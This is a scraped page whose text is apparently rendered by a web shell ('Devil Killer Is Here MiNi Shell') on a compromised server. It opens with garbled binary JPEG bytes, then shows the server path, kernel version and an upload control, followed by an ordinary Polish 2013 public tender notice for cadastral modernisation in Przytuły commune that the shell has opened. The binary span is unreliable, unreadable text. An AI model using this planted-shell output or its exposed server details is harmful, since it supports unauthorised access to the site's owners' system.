JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130930/394538-N-2013.html

<p class="kh_header"><b>Łomża: Modernizacja ewidencji gruntów i budynków (katastru nieruchomości) poprzez założenie ewidencji budynków i lokali dla 20 obrębów położonych na terenie gminy Przytuły.</b><br>
<b>Numer ogłoszenia: 394538 - 2013; data zamieszczenia: 30.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Szosa Zambrowskiego 1/27, 18-400 Łomża, woj. podlaskie, tel. 086 2156904, faks 086 2156904.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatlomyznski.pl/bip</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.powiatlomyznski.pl/bip</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja ewidencji gruntów i budynków (katastru nieruchomości) poprzez założenie ewidencji budynków i lokali dla 20 obrębów położonych na terenie gminy Przytuły..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac obejmował będzie: 
       1.1. Założenie ewidencji budynków i lokali, w tym: 
       1.1.1 Pomiar konturów budynków i dobudówek ,których brak w prowadzonej bazie ewidencji gruntów i budynków.  
       1.1.2 Pomiar zmienionych konturów użytków gruntowych dla terenów zabudowanych oraz zmienionych konturów 
                budynków,
       1.1.3 Pozyskanie ewidencyjnych danych opisowych do ewidencji budynków i lokali,
    1.2 Wykonanie weryfikacji zmienionych użytków gruntowych,
    1.3 Uzupełnienie numerycznej bazy ewidencji gruntów i budynków o treść wynikłą z realizacji pkt 1.1-1.2,
    1.4 Uzupełnienie analogowych map zasadniczych o treść wynikłą z realizacji pkt 1.1-1.2,
    1.5 Opracowanie operatu ewidencyjnego i jego wyłożenie zgodnie z art. 4 i 7 ustawy prawo geodezyjne i kartograficzne,
    1.6 Wykonanie innych czynności niezbędnych do wykonania założonego celu, a których nie można było przewidzieć 
         w trakcie opracowania niniejszych warunków technicznych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Do 20 % zamowienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, gdy wykonawca dostarczy:
 1/ oświadczenie, że wykonawca posiada uprawnienia do wykonywania działalności lub czynności z geodezji w zakresie objętym zamówieniem, 
2/  kopie uprawnień zawodowych do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii z zakresu nr 1 
     i nr 2,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, gdy wykonawca dostarczy:
1/ oświadczenie, że posiada niezbędną wiedzę i doświadczenie do wykonywania zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, gdy wykonawca dostarczy:
1/ oświadczenie, ze posiada odpowiedni potencjał techniczny, a także dysponuje pracownikami zdolnymi do wykonania zamówienia,
2/aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej 
   w zakresie objętym zamówieniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji 
   działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, gdy wykonawca dostarczy:
1/ oświadczenie, ze posiada odpowiedni potencjał techniczny, a także dysponuje pracownikami zdolnymi do wykonania
    zamówienia
2/aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej 
   w zakresie objętym zamówieniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji 
   działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uważa się za spełniony, gdy wykonawca dostarczy:
1/ oświadczenie, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Informacje o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia  warunków udziału w postępowaniu (art. 23, 24, 25 26, 27, art. 36 ust. 1 pkt 6, art. 45, art. 44  ).
   W celu potwierdzenia, że wykonawcy spełniają warunki wymienione w pkt VIII powinni dostarczyć niżej wymienione dokumenty :
1/ formularz oferty sporządzony zgodnie z zał. Nr 3,
2/ oświadczenie, że wykonawca  :
  a/ posiada uprawnienia do wykonywania określonej działalności lub czynności w zakresie objętym zamówieniem,
  b/ posiada niezbędną wiedzę i doświadczenie do wykonywania zamówienia,
  c/ posiada odpowiedni potencjał techniczny, a także dysponuje pracownikami zdolnymi do wykonania zamówienia
  d/znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
  e/ nie podlega  wykluczeniu z postępowania na podstawie art. 24 ustawy - Prawo zamówień publicznych, ( załącznik nr 4)
  f/ spełnia i przyjmuje warunki określone w SIWZ oraz we wzorze umowy.
  g/nie należy do tej samej grupy kapitałowej ,w rozumieniu ustawy z dnia 16.02.2007r. o ochronie konkurencji i konsumen-
     tów(Dz.U.Nr.50,poz.331,z późn. zm.),złożyli odrębne oferty lub wnioski o dopuszczenie do udziału w tym samym postępowaniu,chyba że wykażą,że istniejące między nimi powiązania nie prowadzą do zachwiania uczciwej konkurencji pomiędzy wykonawcami w postępowaniu o udzielenie zamówienia.
3/kopie uprawnień zawodowych do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii z zakresu nr 1 
   i nr 2,
4/ aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do Centralnej Ewidencji i Informacji o 
    Działalności Gospodarczej w zakresie zgodnym z zamówieniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub 
   zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu 
   składania  ofert.
5/ w przypadku składania oferty przez spółkę cywilną wykonawca zobowiązany jest dostarczyć :
  a/ umowę spółki jako uzupełnienie dokumentów potwierdzających prawo występowania w obrocie prawnym, z której wynikać 
    będzie sposób reprezentowania spółki, a także zaciągania w jej imieniu zobowiązań,
b/ dokumenty wymienione w pkt IX.1., IX.2., IX.3,.IX.5.,IX.6.,IX.8.,  
c/ dokumenty wymienione w pkt IX.4., IX.5., IX.6., IX.7., dotyczące każdego ze wspólników.  

6/ w przypadku składania oferty przez podmioty występujące wspólnie ( konsorcjum ) do oferty musi być dołączona umowa 
     konsorcjum zawarta notarialnie lub z potwierdzonymi podpisami przez notariusza, z której wynikać będzie  :
a/ jednoznaczne określenie wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem przedmiot zamówienia,
b/ zawarcie umowy na okres realizacji całego zamówienia, rozumianego jako okres od pobrania specyfikacji istotnych 
   warunków zamówienia, poprzez złożenie oferty, podpisanie umowy, rozpoczęcie prac do ich protokolarnego odbioru przez 
   zamawiającego oraz obejmujący termin  gwarancji,
c/ zobowiązanie do złożenia oferty wspólnej i realizacji zamówienia publicznego w przypadku wyboru oferty,
d/ określenie sposobu reprezentacji wszystkich podmiotów, w tym wskazanie podmiotu wiodącego - lidera, upoważnionego do 
   reprezentowania konsorcjum na zewnątrz podpisania oferty, umowy oraz zaciągania zobowiązań, w tym finansowych do 
   wysokości kwoty obejmującej pełne koszty realizacji zadania wraz z ewentualnymi karami umownymi, a także kosztami 
   gwarancji oraz do bezpośredniego kontaktowania się i współdziałania z zamawiającym, a jego upoważnienie musi być 
   udokumentowane pełnomocnictwem podpisanym przez upoważnionych przedstawicieli podmiotów występujących wspólnie,
e/ sposób współdziałania podmiotów z określeniem podziału zadań w trakcie realizacji zamówienia,
f/ uczestnik konsorcjum nie może złożyć oferty odrębnej.
     Każdy podmiot oferty wspólnej konsorcjum zobowiązany jest dołączyć dokumenty w pkt od IX.2., do IX.8. Podmiot wiodący wskazany w umowie i przedkładający ofertę zobowiązany jest do przedłożenia wszystkich dokumentów wymienionych w pkt IX.
   Potencjał ekonomiczny, finansowy i techniczny oraz doświadczenie przedsiębiorców w sumie muszą spełniać wymagane warunki. W przypadku warunku posiadania pracowników zdolnych do wykonania zamówienia wykonawcy w sumie muszą spełniać wymagane warunki. Oferta musi być opisana w taki sposób,  by prawnie zobowiązywała wszystkie podmioty występujące wspólnie. Wszelka korespondencja oraz rozliczenie dokonywane będą wyłącznie z podmiotem wiodącym - liderem. 
      Płatności będą wnoszone na specjalnie założone w tym celu przez konsorcjum konto bankowe, którego dysponentem z upoważnienia uczestników będzie podmiot wiodący - lider konsorcjum. Firmy występujące wspólnie ( konsorcjum ) ponoszą solidarnie odpowiedzialność za nie wykonanie lub nie należyte wykonanie zamówienia.
    Wszystkie dokumenty powinny być przygotowane w sposób umożliwiający prawidłową ocenę wykonawcy. Brak jakiegokolwiek z w/w dokumentu lub złożenie w niewłaściwej formie ( np. nie poświadczone przez wykonawcę za zgodność z oryginałem odpisy lub kopie ) spowoduje odrzucenia oferty.
7. Oświadczenie, że wykonawca zapewnia minimum 5 letni okres gwarancji na wykonane prace. 
    Uwagi :
   Dokumenty należy złożyć w formie kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do reprezentowania firmy.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatlomyznski.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiat  Łomżyński 18-400  Łomża, ul. Szosa Zambrowska 1/27 tel/fax.(0-86)  2151186,
  e-mail: starosta.blm@powiatypolskie.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2013 godzina 10:00, miejsce: Starostwo Powiatowe  w Łomży, ul. Szosa Zambrowska 1/27  pokój 220 do dnia  15 październik 2013r.  do godz.10.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie modernizacji ewidencji gruntów i budynków (katastru nieruchomości) poprzez założenie ewidencji budynków i lokali dla 7 obrębów ewidencyjnych położonych na terenie gminy Przytuły, powiat łomżyński, woj. podlaskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac modernizacji ewidencji gruntów i budynków.

1. Zakres prac modernizacyjnych będzie obejmował:
     1.1.   Założenie ewidencji budynków i lokali, w tym: 
     1.1.1 Pomiar konturów budynków (budynków wraz z  dobudówkami), których brak w prowadzonej bazie ewidencji gruntów i budynków, lub których kontury zostały zmienione (rozbudowa).  
     
    1.1.2 Pomiar zmienionych konturów użytków gruntowych dla terenów zabudowanych.
    1.1.3 Pozyskanie ewidencyjnych danych opisowych do ewidencji budynków i lokali.
    1.2   Wykonanie weryfikacji zmienionych użytków gruntowych, likwidacja konturów B nie istniejących.
    1.3   Uzupełnienie numerycznej bazy ewidencji gruntów i budynków o treść wynikłą z realizacji pkt 1.1-1.2.
    1.4  Uzupełnienie analogowych map zasadniczych o treść wynikłą z realizacji pkt 1.1-1.2
    1.5  Opracowanie operatu ewidencyjnego po modernizacji.
    1.7  Wykonanie innych czynności niezbędnych do wykonania założonego celu, a których nie można było przewidzieć w trakcie opracowania niniejszych warunków technicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie modernizacji ewidencji gruntów i budynków (katastru nieruchomości) poprzez założenie ewidencji budynków i lokali dla 5 obrębów ewidencyjnych położonych na terenie gminy Przytuły, powiat łomżyński, woj. podlaskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac modernizacji ewidencji gruntów i budynków.

1. Zakres prac modernizacyjnych będzie obejmował:
     1.1.   Założenie ewidencji budynków i lokali, w tym: 
     1.1.1 Pomiar konturów budynków (budynków wraz z  dobudówkami), których brak w prowadzonej bazie ewidencji gruntów i budynków, lub których kontury zostały zmienione (rozbudowa).  
     
    1.1.2 Pomiar zmienionych konturów użytków gruntowych dla terenów zabudowanych.
    1.1.3 Pozyskanie ewidencyjnych danych opisowych do ewidencji budynków i lokali.
    1.2   Wykonanie weryfikacji zmienionych użytków gruntowych, likwidacja konturów B nie istniejących.
    1.3   Uzupełnienie numerycznej bazy ewidencji gruntów i budynków o treść wynikłą z realizacji pkt 1.1-1.2.
    1.4  Uzupełnienie analogowych map zasadniczych o treść wynikłą z realizacji pkt 1.1-1.2,
    1.5  Opracowanie operatu ewidencyjnego po modernizacji.
    1.7  Wykonanie innych czynności niezbędnych do wykonania założonego celu, a których nie można było przewidzieć w trakcie opracowania niniejszych warunków technicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie modernizacji ewidencji gruntów i budynków (katastru nieruchomości) poprzez założenie ewidencji budynków i lokali dla 8 obrębów ewidencyjnych położonych na terenie gminy Przytuły, powiat łomżyński, woj. podlaskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac modernizacji ewidencji gruntów i budynków.

1. Zakres prac modernizacyjnych będzie obejmował:
     1.1.   Założenie ewidencji budynków i lokali, w tym: 
     1.1.1 Pomiar konturów budynków (budynków wraz z  dobudówkami), których brak w prowadzonej bazie ewidencji gruntów i budynków, lub których kontury zostały zmienione (rozbudowa).  
     
    1.1.2 Pomiar zmienionych konturów użytków gruntowych dla terenów zabudowanych.
    1.1.3 Pozyskanie ewidencyjnych danych opisowych do ewidencji budynków i lokali.
    1.2   Wykonanie weryfikacji zmienionych użytków gruntowych, likwidacja konturów B nie istniejących.
    1.3   Uzupełnienie numerycznej bazy ewidencji gruntów i budynków o treść wynikłą z realizacji pkt 1.1-1.2.
    1.4  Uzupełnienie analogowych map zasadniczych o treść wynikłą z realizacji pkt 1.1-1.2,
    1.5  Opracowanie operatu ewidencyjnego po modernizacji.
    1.7  Wykonanie innych czynności niezbędnych do wykonania założonego celu, a których nie można było przewidzieć w trakcie opracowania niniejszych warunków technicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.27.32.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com